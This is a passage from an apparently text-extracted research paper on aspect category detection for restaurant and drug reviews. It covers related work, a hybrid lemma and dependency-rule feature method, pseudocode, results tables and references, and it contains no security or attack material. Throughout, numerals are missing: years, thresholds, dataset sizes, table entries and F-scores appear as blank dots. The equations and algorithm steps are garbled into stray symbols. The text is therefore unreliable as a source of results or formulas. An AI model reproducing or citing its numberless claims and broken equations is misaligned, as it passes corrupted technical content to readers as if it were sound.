rule-based approach to extract aspects. in this, first, fold extract aspects related to domain-independent opinions and second fold extract aspects related to domain-dependent opinions. the author also applied frequency and similarity measure to enhance the accuracy of the aspect extraction of an established system. rana & cheah ( b) proposed a two-level aspect pruning approach that can reduce inappropriate aspects. the author used the sequential pattern-based model to extract noun phrases that represent aspects. aspect elimination is done by estimating the frequency of each word and picking the most frequent aspects. further, the semantic similarity measure is used to select non-frequent features. asghar et al. ( ) proposed a framework performing aspect extraction, sentiment classification, and summary generation. in this work, heuristic rules are used for aspect-sentiment pair extraction. the aspect terms are grouped based on their co-reference pmi value and assigned one aspect category. the sentiment classification is done using the sentiwordnet lexicon. in this work, a summary is generated as a list of positive and negative aspects individually with their sentiment scores. shafie et al. ( ) presented research that uses numerous types of dependency relation for extracting candidate aspects from user review. firmanto & sarno ( ) proposed an aspect-based sentiment analysis method utilizing grammatical rules, word similarity and senticircle. the proposed method starts with the extraction of candidate aspects using grammatical rules. authors used word embedding and word similarity in preprocessing steps for aspect categorization. for keyword extraction, tf-icf is used and in the end, senticircle is utilized to find sentiment polarity. agarwal et al. ( ) presented a concept based approach using dependency rules. in this research, the authors used some dependency rules for feature extraction. the extracted features are enriched by adding some commonsense knowledge extracted from conceptnet. these features are pruned by means of the mrmr feature reduction approach and sentiment classes are predicted using an svm classifier. asghar et al. ( ) used a rule-based classification system to enhance the sentiment classification of reviews in online communities. the essential purpose of this work is to improve the overall performance of sentiment analysis by considering additional features like modifiers, emoticons, domain-related phrases and negations. kang & zhou ( ) proposed rube—unsupervised rule-based techniques to extract subjective and objective features from online consumer reviews. in this work, objective features are collected by integrating part-whole relations and patterns that are specific to reviews. subjective features collected by applying double propagation with indirect dependency and comparative construction. in absa, after feature extraction, feature pruning is necessary to avoid the risk of overfitting and improve accuracy. reduced features require less time for training. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the statistical weight of features can be used to reduce the feature set. so selecting or proposing a feature selection strategy is an open research issue. manek et al. ( ) presented a gini index based feature selection technique with svm classifier that classifies sentiment of movie reviews. this method verified that the gini index improved classification accuracy compared to other feature weighting techniques. liu et al. ( ) proposed a weighted gini index (wgi) feature selection method for imbalanced data. various algorithms namely chi-square, f-statistic and gini index feature selection are compared with proposed system. according to their work f-statistic provides the best performance in the minority class. if the numbers of selected features are more, wgi feature selection lead to better performance. uysal ( ) proposed an enhanced global feature selection system which enhances the classification performance. it offers an improved approach to filter-based feature selection. the improved global feature selection scheme (igfss) is the combination of the global feature selection technique and the local feature selection method. the performance of classification is significantly improved with the igfss approach. many researchers merged commonsense knowledge, the semantics of features with ontology to improve the accuracy of aspect extraction and sentiment classification. schouten, frasincar & de jong ( ) and schouten & frasincar ( ) proposed ontology- enhanced aspect-based sentiment analysis. schouten, frasincar & de jong ( ) concentrated on a knowledge-driven solution with the aim to complement standard machine learning (ml) method. the writers encoded the domain knowledge into a knowledge repository/ontology. in this research, both aspect detection and aspect sentiment analysis is done. it shows that the embedding of commonsense knowledge with ontology-based features improve the performance of classification. for both tasks the libsvm classifier is used. schouten & frasincar ( ) prepared ontology with three classes like sentimentmention, aspectmention, and sentiment value. the ontology is generated using an onto-clean methodology. if the ontology does not predict any class, then the class prediction is done using the bag-of-words backup model. this research signifies that encoding domain knowledge in ontology advances the result of sentiment classification. de kok et al. ( a) and de kok et al. ( b) proposed an ontology centered approach for review level aspect-based sentiment analysis. in this work, they mainly focus on ontology-enhanced methods that complement a standard ml algorithm. for these two different algorithms are used, a review-based and a sentence aggregation algorithm. their work contains feature generators and feature adaptors. several feature generators are independent of the ontology which are aspect, sentence count, lemma and several are dependent on an ontology which are ontology concepts, sentiment count. also, they used several feature adaptors which are ontology concept score, negation handling, synonyms, weight, word window, etc. ma, peng & cambria ( ) improved the lstm network with a hierarchical attention mechanism. the main influence of this work is the integration of commonsense knowledge of sentiment related concepts into an attentive lsmt. this research accomplished the two tasks that is, aspect extraction and sentiment classification. zeng et al. ( ) used a convolutional neural network (cnn) with linguistic resources and gating mechanism for aspect-based sentiment analysis (absa). al-smadi et al. ( ) bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ suggested a supervised learning method for aspect extraction and classification of sentiments. the classifiers are trained on lexical, morphological, syntactic and semantic features. baas et al. ( ) introduced a new approach by using svm with six different pattern classes. this includes lexical, syntactic, semantic, hybrid, and surface feelings. the lexico-semantic patterns were used in the customer reviews to identify aspect-based feeling (abs). synset bigram, negator pos bigram, and pos bigram are used to enhance the extraction of aspects based on feelings. latent dirichlet allocation topic model is applied by amplayo, lee & song ( ). this work is an extension of the aspect and sentiment unification model (asum). it considers seller sentiments for aspect extraction and sentiment classification. seller-aided aspect-based sentiment model (sa-asm) and seller-aided product based sentiment model (sa-pbm) are proposed. sa-asm provides improved results for sentiment classification and sa-pbm for aspect extraction. al moubayed, mcgough & hasan ( ) proposed a deep learning approach for topic modelling. topic modelling is used in this method for extraction of features and it eliminates the need for subject-specific lexicon. firstly, the dataset is categorized into two categories like positive and negative. then topic modelling is used to extract features from each class of training dataset that are further given as input to train the stacked denoising autoencoders (sdas). the overall reconstruction error from each sda is used by a linear classifier to predict the class. xu et al. ( ) suggested a new implicit aspect recognition method that relies on non-negative matrix factorization (nmf). this method clusters aspects of a product by merging co-occurrence data with intra-relations of aspects and sentiments. kim ( ) proposed an advanced semi-supervised system for reducing dimensionality. weighting and extraction of features are performed in a semi-supervised manner. kumar, pannu & malhi ( ) introduced the aspect based sa using semantic features and deep networks. domain-specific ontology is generated after preprocessing of review sentences to obtain semantic features. the word vec is generated by applying unsupervised neural network to the processed corpus. this vector is used for training cnn model. this method has produced significant results. the cnn model is optimized using particle swarm optimization. the subtasks in absa are aspect term extraction, aspect category detection, opinion term extraction, and sentiment analysis. the proposed system is focusing only on aspect category detection. in aspect category detection task aspect terms are important to detect category. if the aspect terms are not specified explicitly then it can be predicted from the opinion words also. therefore, the proposed system works on lemma features as well as dependency rule-based features. dependency rule-based features are meaningfully related words in a sentence which support to predict aspect category. the main objectives of this research work are, (i) to examine the effect of feature selection strategy on classification performance, (ii) to examine the effect of dependency rule-based features on the classification performance. the datasets used in this system are semeval restaurant review dataset (pontiki et al., ), yelp and kaggle datasets. the article is structured as; “introduction” highlights recent developments in the field of research, proposed method is presented in “proposed method”, “results and discussion” focuses on results and discussion and concluding remarks is presented in “conclusions”. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed method the technique presented in this article uses a supervised methodology for aspect extraction from review sentences. the datasets used for this research are semeval restaurant review dataset, yelp and kaggle datasets. semeval restaurant review dataset contains , training sentences and test sentences. the restaurant reviews are specified in sentence format. the snippet of the dataset is shown in fig. . this dataset has sentences with the aspect categories like food, ambiance, price, service and miscellaneous/anecdotes. these categories of aspects can be specified explicitly or implicitly. explicit aspect categories are specified directly in the sentences. for example, in the above snippet, the first sentence is about the food aspect and the aspect is explicitly specified in it. the aspect of the second review sentence is service, but it is not specified explicitly. the word “small tip” specifies it. in reviews, a single sentence may have one or more aspect categories. the aim of this study is to extract aspects from the review sentences and not to decide sentiments. the detailed architecture is demonstrated in fig. . the process of aspect category extraction is elaborated as below. preprocessing first, the stop words are removed from training and test sentences and then the lemmatization is done. from both datasets, punctuation marks are removed and contractions like can’t, isn’t, etc. are replaced with cannot and is not. feature extraction in feature extraction, two types of features are extracted from the training dataset and a hybrid feature set is created. the extracted features include: a) lemma features b) rule based features c) hybrid features figure example snippet from restaurant review dataset. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a) lemma features: the process of lemma feature extraction and selection includes the following steps: . after preprocessing, the lemmas are extracted from each sentence. a matrix is generated from these lemma features that contain review id, lemma feature, term frequency of each feature and aspect category label. here, in the corresponding aspect group, term frequency is the number of times the term is present in that aspect category. from this matrix, distinct lemmas with term frequency more than threshold thf in corresponding aspect category are selected. here, threshold thf is . this value is selected based on intuition. . further, a matrix is generated which contains review id, lemma features, its term frequency in each aspect categories and the actual aspect category label. . this matrix is considered as a training matrix. during testing, the following process is followed. . from each test sentence, lemmas are extracted. . for each lemma in the test sentence, a vector from a training matrix for the matching lemma is copied to the test matrix. figure proposed system architecture. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . the above process is done for all lemma features in a test sentence. then probability is calculated for each aspect category. the aspect category having the highest probability is given as a category label for the test sentence. in line with the first objective, the above is the base system where features are selected using term frequency only. the same experimentation is carried out using a multivariate filter method of feature selection. in classification problems, an excessive number of features not only increase the computational time but also degrade the accuracy of classification (abualigah et al., ). so it is necessary to extract significant features. these selective features train the machine learning algorithm faster, increases accuracy and avoids overfitting. methods of feature selection can be classified into categories: filter, wrapper, and hybrid approaches (labani et al., ). in the wrapper method of feature selection, a subset of features is selected to train the machine learning algorithm. based on the results, the features are added or removed from the set. in the filter approach, feature selection is independent of any machine learning algorithm. here, features are selected based on statistical tests like linear discriminant analysis, analysis of variance, chi-square etc. filter methods are classified as a univariate and multivariate feature selection methods. in the univariate method, individual features are assigned a statistical score and top-ranked features are selected. the disadvantage of this approach is that it selects relevant features and ignores redundancy among them as it ignores the relationship between features. in the multivariate method, the relationship between individual features is considered. the combination of filter and wrapper methods is the hybrid method. the proposed system uses a multivariate filter approach. in it, relevant features are selected by means of weighted term frequency score and redundancy is avoided by calculating the pearson correlation coefficient between features. in the proposed system, similar to the base system, features having term frequency greater or equal to three is selected. weight is calculated for the selected terms as per eq. ( ). terms with a weight greater than threshold thwk are selected. here thwk is the threshold on weight in aspect category k. from these features, a matrix is generated which contains review id, feature, term frequency in all aspect categories and the actual aspect category label. for each feature in an aspect category, the correlation is determined with all other terms in the related category. features with correlation value that exceeds the threshold thc are not considered because these are highly correlated features that may increase redundancy. the value of threshold thc for this experimentation is . which is selected through repetitive testing. similar to the base system, a training matrix is generated using selected features and testing is performed. weight fð Þ ¼ frequency fð Þk total frequency fð Þ ( ) the above-stated feature selection strategy enhanced the result of the aspect extraction task compared to the method which uses term frequency-based features only. this feature bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selection approach is an extension of the work described in bhamare, jeyanthi & subhashini ( ) where a correlation was calculated using the weight of terms. here it is calculated using the term frequency of features. b) rule based features: in this approach, features are selected based on grammatical relationships between words. stanford nlp parser is used to extract grammatical relationships between words. sometimes the phrases or related words in a sentence give more information about the aspect compared to the single lemma features. as in fig. , the arrows indicate the relationship between words in a sentence. the parser extracts the features: like restaurant, like food, like i, restaurant this, food tasty, etc. in the first testing, all the dependency relationships except determinant (det) relation are used to extract rule-based features. for each pair of features in an aspect category, its term frequency is calculated and distinct features are selected. here, term frequency is not applied for feature selection as many dependency relations will not occur regularly. from these selected features, a matrix is generated which contains review id, feature, its term frequency in each aspect category and the actual aspect category label. this matrix is the training matrix. testing is performed similar to lemma based approach but the difference is that from each test sentence instead of lemma features rule-based features are extracted. in the second experimentation, features are not selected by considering all grammatical rules. here, the dependency relations which contain any of the nouns, adjectives, adverbs are used to extract features. the rules used are mentioned below (de marneffe & manning, ): acomp: adjectival complement in a sentence, when an adjectival phrase acts as a complement to the main verb in the sentences it is defined as an adjectival complement. advcl: adverbial clause modifier in a complex sentence, the clause modifying the relationship of the verbal phrases (viz. temporal, conditional, comparative, purpose clause, concessional, manner and result) is identified as an adverbial clause modifier. advmod: adverb modifier in a sentence or phrase an adverb modifier can be defined as a word that modifies a noun, an adjective or a verb; especially in a non-clausal sentence. agent: agent an agent is a word that complements the passive verb in a sentence and is explained further by the use of the preposition “by”. unlike basic dependencies output, this association is present only in sentences where collapsed dependencies appear. amod: adjectival modifier in a sentence or a phrase, when an adjectival phrase alters the meaning of the noun phrase, it is called as an adjectival modifier. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conj: conjunct a conjunct explains the association between two words that are related and connected by using the co-ordinating conjunctions like “and”, “or”, etc. the conjuncts are treated unevenly; wherein the first conjunct leads and the other conjuncts are dependent on the first by way of relation. cop: copula a copula is a connecting word, particularly a form of a verb that connects the subject and the complement. copula is often considered to be dependent on its complement. dobj: direct object a direct object is a noun, noun phrase, or pronoun that signifies what or who receives the action of a transitive verb in a clause or sentence. neg: negation modifier a negation modifier identifies the connection between a negation word or phrase and the np or vp it modifies. nn: noun compound modifier a noun compound modifier refers to a noun in the sentence that provides a better understanding of the head noun and tends to modify it. nsubj: nominal subject a noun phrase is a pro-agent of a clause in a sentence which is also known as a syntactic subject is called a nominal subject. the association in the sentence; unlike standard grammar rules, isn’t controlled by the verb. when there is a copular verb, the root of the clause is the complement of the copular verb which could either be an adjective or a noun. nsubjpass: passive nominal subject when a nominal subject; which is the syntactic subject, is used in a passive voice in a sentence, it is defined as a passive nominal subject. rcmod: relative clause modifier a relative clause that modifies the noun phrase is known as a relative clause modifier. it is placed next to the noun it modified but can also be separated wherein an essential modifier is used. the association moves from the noun phrase to the relative clause; usually by use of a verb. punct nmod dobj det case nsubj amod det i like the tasty food in this restaurant prp vbp dt jj nn in dt nn figure dependency relations in a sentence. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ xcomp: open clausal complement a predicative or clausal complement (without its own subject) of a verb or an adjective is known as an open clausal complement. the subject in this case is indicated by phrase / words external to the xcomp. the clausal complements are not adjuncts or modifiers and are always non-finite. nmod: nominal modifier the relationship between the noun / predicate modified by the prepositional supplement and the noun introduced by the preposition is the nmod relation. the testing proves that the system which uses features extracted using selective dependency relations increases the performance compared to the system that uses all dependency relations. c) hybrid features: in this method, both lemma features and rule-based features are used to obtain a training matrix. the rule-based features are extracted using dependency relations mentioned in section b and lemma features are selected using the multivariate filter method. the training matrices of both types of features are concatenated to obtain a single training matrix. at the time of testing, from each sentence, both lemma features and rule-based features are extracted and a similar testing process as mentioned for the base system is followed to determine the aspect category label. this experimentation shows that the performance of aspect category extraction is improved if rule-based features are combined with lemma features. algorithms – explain the detail process of the proposed hybrid method. results and discussion this research is carried out on datasets such as the restaurant review dataset semeval, yelp and kaggle datasets. for semeval dataset, fig. shows the relative percentage of the total number of sentences in the individual aspect category. the distribution of data between the aspect categories in the dataset is not balanced. this affects the performance of the classifier. in this dataset, % of sentences are of the food aspect category and that of price category is only %. to handle this problem, features are not extracted by considering the dataset as a whole because it will cause selecting features from major categories only. in the proposed work, review sentences are grouped according to the aspect category and then applying the proposed method, features are extracted from each aspect category. this causes to select relevant features from each aspect category. some of the sentences in the semeval dataset have more than one aspect category. fig. represents this distribution. % of sentences have unique aspect categories, % have two aspect categories in a sentence and % have more than two aspect categories in a sentence. the proposed system extracts only one aspect category from each sentence. in the training and testing dataset, sentences having multiple aspect categories are duplicated and assigned unique categories. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the evaluation measure used in this experimentation is f -score to compare results of different tests. the f score (eq. ) is calculated from precision and recall. in the eq. ( ) and ( ) tp is true positive, fp is false positive, and fn is false negative. f ¼ � precision � recall precision þ recall ( ) algorithm feature selection using multivariate filter method. preprocessing: stop word removal and stemming is done for all training samples. input: frequency[i][j]k is the matrix of features in aspect category k containing the occurrence count (tf) j of feature i. threshold for tf is thf. threshold for correlation thc. output: a training matrix. step : for every feature f in frequency[ ][ ] if (frequency[f]� thf rfrequency.add(f) end for all the selected distinct/unique features are then added to ufrequency[ ][ ] step : for every feature f in ufrequency weight(f)= ufrequency[f][j]/total[f] where total[f] is tf value of that feature in all aspect categories and ufrequency[f][j] is the tf value in that aspect category. if weight(f) >thwk where thwk is a threshold on weight in aspect category k. add f in weighted[f][j] where weighted[f][j] represents the tf of feature f in aspect category j. j represents aspect categories ..k. end if end for the weight threshold is different for each aspect category. step : a matrix weighted[i][j] is reorganized with i = {t , . . ,tn} and j={ak , . . ,ak } representing aspect categories. individual row in weighted[i][j] is tf of feature i in ak . . ak aspect categories. step : for every ti in weighted, compute correlation with other features in aspect category ak cor t½ � ¼ n p x½ �y½ �ð Þ � p x½ �ð Þ � p y½ �ð Þffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi n p x � p xð Þ � � n p y � p yð Þ � �q end for compute average correlation for each term and update it in weighted[i][j+ ]. step : to avoid redundancy, features are selected based on correlation. for every t in weighted [i][j+ ] cor[t]=weighted[i][j+ ] if (cor t½ � � thc) then copy row weighted[t][j] to trainmatrixl[t][l] end if end for trainmatrixl[][] is the training matrix. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm feature extraction based on dependency rules. input: training dataset output: a training matrix step : for every sentence s in training dataset d extract grammatical rule based features using stanford nlp parser step : for every rule based feature, find its occurrence count in corresponding aspect category. step : for each aspect category, prepare matrix containing distinct rule based features with its occurrence count in that aspect category step : prepare matrix dptrainmatrixl[i][j] of all rule based features, where i represents the feature/term and j represents its occurrence count in aspect categories {ak ,..,ak } and the actual category label. algorithm algorithm for aspect category extraction using hybrid features. preprocessing: stop word removal, stemming applied for all test samples. from test samples, punctuation marks are removed and contractions are replaced with words. input: trainmatrixl[i][j], dptrainmatrixl[m][n], test dataset output: aspect label to test sentences. step : generate hybrid training matrix hybridmatrix[i][j] ) concat(trainmatrixl, dptrainmatrixl) step : extract lemma and rule based features from individual test sentence step : for every sentence k from test dataset for every feature f of sentence k for every term t in hybridmatrix[t][j] if test feature f = = term in hybridmatrix test[f][ .. ]=hybridmatrix[t][ .. ] end if end for end for end for step : calculate the probability of an individual aspect group. step : aspect group with the maximum probability value is returned as a test sentence label. food miscellaneous service ambience price n um be r of s en te nc es (% ) aspect category figure relative percentage of number of sentences in individual category. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ precision ¼ tp tp þ fp ( ) recall ¼ tp tp þ fn ( ) table shows the f score obtained when only lemma features are used. as for lemma features, two feature selection strategies are used: term frequency-based feature selection approach which is a base system and multivariate filter-based feature selection approach. the results demonstrated the first objective that the feature selection approach improves classification performance. table shows that the multivariate filter method of feature selection has gained more f score in all aspect categories compared to the base system. this strategy of feature selection selected relevant features and avoided redundant features whereas the base system focuses on only relevant features and ignores redundancy among features. > number of sentences (%) n um be r of a sp ec t c at eg or y p er se nt en ce figure representation of number of aspect categories per sentence. full-size doi: . /peerj-cs. /fig- table f score (%) obtained using term frequency based feature selection approach and multivariate filter feature selection approach (semeval dataset). approach aspects precision (%) recall (%) f -score (%) term frequency approach of feature selection ambience . . . miscellaneous . . . food . . . price . . . service . . . multivariate filter approach of feature selection ambience . . . miscellaneous . . . food . . . price . . . service . . . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows f -score obtained using approach b. in approach b features are selected using dependency relations. in the first experimentation of approach b, features are extracted by considering all dependency relations. in second, features are extracted by applying selective dependency relations. if all dependency relations are considered to extract features, then it increases redundant features. also, some irrelevant features get extracted which depreciates the performance of classification. the dependency relations considered here are selective which helps to choose relevant features. another objective of this research is to analyze the effect of dependency rule-based features on the classification performance. this testing proves that features extracted using selective dependency relations improve the performance of classification. table shows the outcomes acquired by utilizing the proposed technique. in it, the hybrid features include lemma based features that are selected using a multivariate filter feature selection method and rule-based features that are extracted by applying selective dependency relations. table displays that the proposed hybrid system has gained . % f -score which is more than the f -score attained in schouten et al. ( ) using the supervised and unsupervised approach. the proposed system attained improved results for the food and ambience aspect categories in comparison to the supervised approach in (schouten et al., ). the unsupervised approach in (schouten et al., ) defines the aspect category taking into account the terms in the sentence. this is the table f - score (%) of system using features extracted by applying (i) all dependency relations (ii) selective dependency relations (semeval dataset). approach aspect category precision (%) recall (%) f -score (%) features extracted considering all dependency relations ambience . . . miscellaneous . . . food . . . price . . . service . . . features extracted considering selective dependency relations ambience . . . miscellaneous . . . food . . . price . . . service . . . table f -score (%) in proposed approach using hybrid features (semeval restaurant review dataset). approach aspect category precision (%) recall (%) f -score (%) proposed system with hybrid approach ambience . . . miscellaneous . . . food . . . price . . . service . . . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ unsupervised solution as it prohibits the use of labels and generates a collection of seed terms for each aspect category. using a semantic lexicon like wordnet, the collection of seed terms for each aspect category is created. fig. shows the precision and recall values obtained using different methods. these approaches are implemented using the semeval restaurant review dataset. the precision and recall percentage in the proposed system is improved relative to the other methods. in the proposed system, the feature selection method is applied for the lemma features and the selective dependency relations are considered to select dependency rule based features. this encouraged the relevant features to be picked. in addition to this, the use of correlation helped to prevent feature redundancy. the use of relevant features and the elimination of redundancy resulted in increased percentage of precision and recall. table f score (%) obtained using different methods. approach precision (%) recall (%) f -score (%) semeval restaurant review dataset proposed system with hybrid features . . . (schouten et al., ) unsupervised approach . . . (schouten et al., ) supervised approach . . . (brychcín, konkol & steinberger, ) . . . yelp restaurant review dataset proposed system with hybrid features . . . (kiritchenko et al., ) (constrained) . . . (panchendrarajan et al., ) . . . patient reviews on drug (kaggle dataset) (rachel, ) proposed system with hybrid features . . . proposed system with hybrid features (schouten et al., ) unsupervised approach (schouten et al., ) supervised approach (brychcín, konkol & steinberger, ) pr ec is io n an d re ca ll (% ) different approaches for aspect category prediction precision recall figure precision and recall of different methods (semeval restaurant review dataset). full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods cited in fig. used yelp restaurant review dataset. table shows that the proposed system has shown improved results on this dataset compared to other methods. in this work, reviews are randomly selected from yelp dataset. from this are used at the time of training and are used for testing. these results obtained by considering categories like restaurant, ambience, food and service. this algorithm is also tested on kaggle dataset that includes patient reviews on drugs and the aspect categories are disease name. the system yield f score . % on kaggle dataset. for this experimentation, reviews are randomly selected from kaggle. conclusions in this work, two approaches for the aspect category prediction task are proposed. in the first, a multivariate filter approach of feature selection is offered. this shows that the relevant features increase the performance of classification if redundancy among selected features is reduced. in the second approach, dependency relation based features are selected for aspect category prediction. this approach shows that features extracted using selective grammatical rules improve the performance of classification compared to features extracted using all rules. the hybrid feature set is a combination of multivariate filter based lemma features and selective grammatical rule-based features. the use of hybrid feature set increases the f score of aspect detection task to . %. this work can be further extended by adding semantic features and using a combination of supervised and unsupervised approaches. also, the feature set can be enhanced by adding bi-tagged features. additional information and declarations funding the authors received no funding for this work. proposed system with hybrid features (kiritchenko et al., ) constrained (panchendrarajan r et al., ) pr ec is io n an d re ca ll (% ) precision recall figure precision and recall of different methods (yelp dataset). full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � bhavana r. bhamare conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, implemented full work, and approved the final draft. � jeyanthi prabhu conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, help in implemention of full work, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/bhavanaacc/absa. semeval data is available at metashare: http://metashare.ilsp.gr: /repository/ browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f /. this dataset can be accessed after completing the registration process. after registration using username and password, one can access the dataset. under the distribution licence of the dataset provider, the restriction is that the dataset can be used for “academic non-commercial use, no redistribution”. yelp data is available at kaggle: https://www.kaggle.com/omkarsabnis/yelp-reviews- dataset. drug data is also available at kaggle: https://www.kaggle.com/jessicali /kuc- hackathon-winter- ?select=drugscomtest_raw.csv. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abualigah lm, khader at, al-betar ma, alomari oa. . text feature selection with a robust weight scheme and dynamic dimension reduction to text document clustering. expert systems with applications : – doi . /j.eswa. . . . afzaal m, usman m, fong a. . tourism mobile app with aspect-based sentiment classification framework for tourist reviews. ieee transactions on consumer electronics ( ): – doi . /tce. . . agarwal b, poria s, mittal n, gelbukh a, hussain a. . concept-level sentiment analysis with dependency-based semantic parsing: a novel approach. cognitive computation ( ): – doi . /s - - - . ahmad k, cheng d, almas y. . multi-lingual sentiment analysis of financial news streams. in: st international workshop on grid technology for financial modeling and simulation. trieste: sissa medialab . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bhavanaacc/absa http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/jessicali /kuc-hackathon-winter- ?select=drugscomtest_raw.csv https://www.kaggle.com/jessicali /kuc-hackathon-winter- ?select=drugscomtest_raw.csv http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tce. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ akhtar n, zubair n, kumar a, ahmad t. . aspect based sentiment oriented summarization of hotel reviews. procedia computer science : – doi . /j.procs. . . . al moubayed n, mcgough s, hasan ba. . beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling. peerj computer science ( ):e doi . /peerj-cs. . al-smadi m, al-ayyoub m, jararweh y, qawasmeh o. . enhancing aspect-based sentiment analysis of arabic hotels’ reviews using morphological, syntactic and semantic features. information processing & management ( ): – doi . /j.ipm. . . . amplayo rk, lee s, song m. . incorporating product description to sentiment topic models for improved aspect-based sentiment analysis. information sciences – : – doi . /j.ins. . . . anand d, naorem d. . semi-supervised aspect based sentiment analysis for movies using review filtering. procedia computer science : – doi . /j.procs. . . . asghar mz, khan a, ahmad s, qasim m, khan ia. . lexicon-enhanced sentiment analysis framework using rule-based classification scheme. plos one ( ):e doi . /journal.pone. . asghar mz, khan a, zahra sr, ahmad s, kundi fm. . aspect-based opinion mining framework using heuristic patterns. cluster computing (s ): – doi . /s - - - . baas f, bus o, osinga a, van de ven n, van loenhout s, vrolijk l, schouten k, frasincar f. . exploring lexico-semantic patterns for aspect-based sentiment analysis. in: proceedings of the th acm/sigapp symposium on applied computing, – . benkhelifa r, bouhyaoui n, laallam fz. . a real-time aspect-based sentiment analysis system of youtube cooking recipes. in: machine learning paradigms: theory and application. cham: springer, – . bhamare br, jeyanthi p, subhashini r. . aspect category extraction for sentiment analysis using multivariate filter method of feature selection. international journal of recent technology and engineering ( ): – doi . /ijrte.c . . brychcín t, konkol m, steinberger j. . uwb: machine learning approach to aspect-based sentiment analysis. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . de kok s, punt l, van den puttelaar r, ranta k, schouten k, frasincar f. a. review-aggregated aspect-based sentiment analysis with ontology features. progress in artificial intelligence ( ): – doi . /s - - - . de kok s, punt l, van den puttelaar r, ranta k, schouten k, frasincar f. b. review-level aspect-based sentiment analysis using an ontology. in: proceedings of the rd annual acm symposium on applied computing, – . de marneffe mc, manning cd. . stanford typed dependencies manual. available at https:// nlp.stanford.edu/software/dependencies_manual.pdf. el hannach h, benkhalifa m. . wordnet based implicit aspect sentiment analysis for crime identification from twitter. international journal of advanced computer science and applications : – . firmanto a, sarno r. . aspect-based sentiment analysis using grammatical rules, word similarity and senticircle. international journal of intelligent engineering and systems ( ): – doi . /ijies . . . hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the tenth acm sigkdd international conference on knowledge discovery and data mining. – . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijrte.c . http://dx.doi.org/ . /s - - - https://nlp.stanford.edu/software/dependencies_manual.pdf https://nlp.stanford.edu/software/dependencies_manual.pdf http://dx.doi.org/ . /ijies . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ 